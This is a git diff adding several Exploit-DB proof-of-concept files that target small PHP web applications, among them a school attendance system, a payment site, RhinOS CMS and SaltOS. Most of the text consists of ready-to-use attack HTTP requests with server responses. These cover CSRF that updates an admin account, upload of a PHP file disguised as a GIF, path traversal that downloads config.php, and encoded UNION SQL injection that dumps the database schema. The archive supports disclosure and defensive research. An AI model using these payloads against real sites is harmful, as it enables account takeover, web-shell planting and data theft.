'3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png') +); \ No newline at end of file diff --git a/exploits/php/webapps/45725.txt b/exploits/php/webapps/45725.txt new file mode 100644 index 000000000..a7ea4c063 --- /dev/null +++ b/exploits/php/webapps/45725.txt @@ -0,0 +1,84 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18797 + +# POC: +# 1) +# .../[PATH]/user/user/edit.php +#02 if (!isset($_SESSION['ACCOUNT_ID'])){ +#03 redirect(web_root."index.php"); +#04 } +#05 +#06 @$USERID = $_GET['id']; +#07 if($USERID==''){ +#08 redirect("index.php"); +#09 } +#10 $user = New User(); +#11 $singleuser = $user->single_user($USERID); +# .../[PATH]/user/controller.php +#80 $user = New User(); +#81 $user->ACCOUNT_NAME = $_POST['U_NAME']; +#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME']; +#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']); +#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE']; +#85 $user->update($_POST['USERID']); +#86 +#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success"); +#88 redirect("index.php"); +# ... + + + + + + + + + + + + + + + + + + + +POST /[PATH]/user/controller.php?action=edit HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 136 +USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save= +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:57:48 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 128 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`useraccounts` */ +$useraccounts = array( + array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png') +); \ No newline at end of file diff --git a/exploits/php/webapps/45726.txt b/exploits/php/webapps/45726.txt new file mode 100644 index 000000000..5cdaae781 --- /dev/null +++ b/exploits/php/webapps/45726.txt @@ -0,0 +1,89 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18799 + +# POC: +# 1) +# http://localhost/[PATH]/event/controller.php?action=photos +# +GIFefe + +# http://localhost/[PATH]/event/photo/[FILE] +# +#[PATH]/event/controller.php +#.... +#29 function doInsert(){ +#30 if(isset($_POST['save'])){ +#31 +#32 +#33 $errofile = $_FILES['image']['error']; +#34 $type = $_FILES['image']['type']; +#35 $temp = $_FILES['image']['tmp_name']; +#36 $myfile =$_FILES['image']['name']; +#37 $location="photo/".$myfile; +#38 +#39 @$file=$_FILES['image']['tmp_name']; +#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name'])); +#41 @$image_name= addslashes($_FILES['image']['name']); +#42 @$image_size= getimagesize($_FILES['image']['tmp_name']); +#.... +GET /[PATH]/event/controller.php?action=photos HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3634372676911755021110261466 +Content-Length: 617 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="EventID" +1 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +1000000 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php" +Content-Type: application/force-download +GIFefe + +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="savephoto" +-----------------------------3634372676911755021110261466-- +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:27:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 143 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45727.txt b/exploits/php/webapps/45727.txt new file mode 100644 index 000000000..61b55cc8d --- /dev/null +++ b/exploits/php/webapps/45727.txt @@ -0,0 +1,108 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18798 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +#[PATH]/student/view.php +#01 select_student($_GET['id']); +#04 +#05 +#06 $course = New Course(); +#07 $resCourse = $course->single_course($res->CourseID); +#08 +#09 ?> +GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:37:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/event/index.php?view=view&id=[SQL] +# +#[PATH]/event/view.php +#01 single_event($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:12:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] +# +#[PATH]/user/view.php +#01 single_user($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:16:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45728.txt b/exploits/php/webapps/45728.txt new file mode 100644 index 000000000..59de07780 --- /dev/null +++ b/exploits/php/webapps/45728.txt @@ -0,0 +1,104 @@ +# Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18800 + +# POC: +# 1) +# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] +# +#[PATH]/accomodation.php +#... +#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; +#51 +#52 +#53 }elseif(isset($_GET['q'])){ +#54 +#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; +#56 +#57 +#58 +#59 } +#60 +#61 $accomodation = ' | ' . $_GET['q']; +#62 ?> +#... +GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:55:17 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?p=rooms&q=[SQL] +# +#[PATH]/room_rates.php +#... +#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; +#51 +#52 +#53 }elseif(isset($_GET['q'])){ +#54 +#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; +#56 +#57 +#58 }else{ +#59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; +#60 } +#61 +#62 $accomodation = ' | ' . @$_GET['q']; +#63 ?> +#... +GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:58:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/admin/login.php +# +#[PATH]/admin/login.php +#... +#58 if (isset($_POST['btnlogin'])) { +#59 //form has been submitted1 +#60 +#61 $uname = trim($_POST['email']); +#62 $upass = trim($_POST['pass']); +#... \ No newline at end of file diff --git a/exploits/php/webapps/45729.txt b/exploits/php/webapps/45729.txt new file mode 100644 index 000000000..2a224ca56 --- /dev/null +++ b/exploits/php/webapps/45729.txt @@ -0,0 +1,62 @@ +# Exploit Title: RhinOS CMS 3.x - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: https://netix.dl.sourceforge.net/project/rhinos/archived/r1190/RhinOS-en-3.0-1190.win32.exe +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18760 + +# Users... +# C:/rhinos/demo/admin/php/download.php +#.... +#26 $head=0;$main=0;$tail=0; +#27 include("inicio.php"); +#28 if(!check_user()) die(); +#29 $name=getParam("name"); +#30 $file="files/".getParam("file"); +#31 $size=getParam("size"); +#32 $type=getParam("type"); +#33 if(!file_exists($file)) die(); +#34 header("Pragma: public"); +#35 header("Expires: 0"); +#36 header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); +#37 header("Content-Type: $type"); +#38 header("Content-Length: $size"); +#39 header("Content-Disposition: attachment; filename=\"$name\""); +#40 header("Content-Transfer-Encoding: binary"); +#41 $fp=fopen($file,"rb"); +#42 while(!feof($fp)) echo fread($fp,8192); +#43 fclose($fp); +#44 disconnect(); +#.... + +# POC: +# 1) +# http://localhost/[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php +# +GET /[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: remember=0; PHPSESSID=ek24koab445aab70seegi02lh3 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:23:54 GMT +Server: Apache/2.2.16 (Win32) PHP/5.3.3 +X-Powered-By: PHP/5.3.3 +Expires: 0 +Cache-Control: must-revalidate, post-check=0, pre-check=0 +Pragma: public +Content-Length: 1771 +Content-Disposition: attachment; filename="efe.php" +Content-Transfer-Encoding: binary +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: \ No newline at end of file diff --git a/exploits/php/webapps/45730.txt b/exploits/php/webapps/45730.txt new file mode 100644 index 000000000..1cc367bfd --- /dev/null +++ b/exploits/php/webapps/45730.txt @@ -0,0 +1,39 @@ +# Exploit Title: E-Negosyo System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18801 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 20:24:30 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?q=single-item&id=[SQL] +# .... \ No newline at end of file diff --git a/exploits/php/webapps/45731.txt b/exploits/php/webapps/45731.txt new file mode 100644 index 000000000..914171c77 --- /dev/null +++ b/exploits/php/webapps/45731.txt @@ -0,0 +1,50 @@ +# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32 +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18761 + +# POC: +# 1) +# http://localhost/[PATH]/index.php +# +POST /index.php HTTP/1.1 +Host: http://localhost/[PATH]:57187 +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://localhost/[PATH]:57187/index.php +Content-Length: 1318 +Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; lang=en_US; __lang__=1543313377; style=blue; __style__=1543313377; iconset=silk; __iconset__=1543313377 +DNT: 1 +Connection: keep-alive +action=login&querystring=&user=%2531%2527%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%2575%256e%2574%2528%252a%2529%252c%2563%256f%256e%2563%2561%2574%2528%2528%2573%2565%256c%2565%2563%2574%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%2528%2563%2561%2573%2574%2528%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%2561%2573%2520%2563%2568%2561%2572%2529%252c%2530%2578%2537%2565%2529%2529%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2577%2568%2565%2572%2565%2520%2574%2561%2562%256c%2565%255f%2573%2563%2568%2565%256d%2561%253d%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%256c%2569%256d%2569%2574%2520%2530%252c%2531%2529%252c%2566%256c%256f%256f%2572%2528%2572%2561%256e%2564%2528%2530%2529%252a%2532%2529%2529%2578%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2567%2572%256f%2575%2570%2520%2562%2579%2520%2578%2529%2561%2529%2520%2541%254e%2544%2520%2527%2545%2566%2565%2527%253d%2527%2545%2566%2565&pass=x&lang=en_US&style=blue&iconset=silk +HTTP/1.1 200 OK +Host: localhost/[PATH]:57187 +Connection: close +X-Powered-By: PHP/5.4.15 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: PHPSESSID=3lqcs1bhqitg8ufb7v9kot7c71; path=\ +Set-Cookie: user=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: __user__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: pass=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: __pass__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: remember=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: __remember__=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=\ +Set-Cookie: lang=en_US; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __lang__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: style=blue; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __style__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: iconset=silk; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Set-Cookie: __iconset__=1543313406; expires=Tue, 27-Nov-2018 10:10:06 GMT; path=\ +Content-Type: text/html;charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45733.txt b/exploits/php/webapps/45733.txt new file mode 100644 index 000000000..ec8eba5c7 --- /dev/null +++ b/exploits/php/webapps/45733.txt @@ -0,0 +1,39 @@ +# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/saltos/stable/SaltOS-3.1-8126.linux-i686.tgz +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18763 + +# POC: +# 1) +# http://localhost/[PATH]/index.php +# +POST /[PATH]/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 747 +Cookie: PHPSESSID=il9r6344ch0ned04kg1hpc7l45; lang=en_US; __lang__=1543322831; style=blue; __style__=1543322831; iconset=silk; __iconset__=1543322831 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 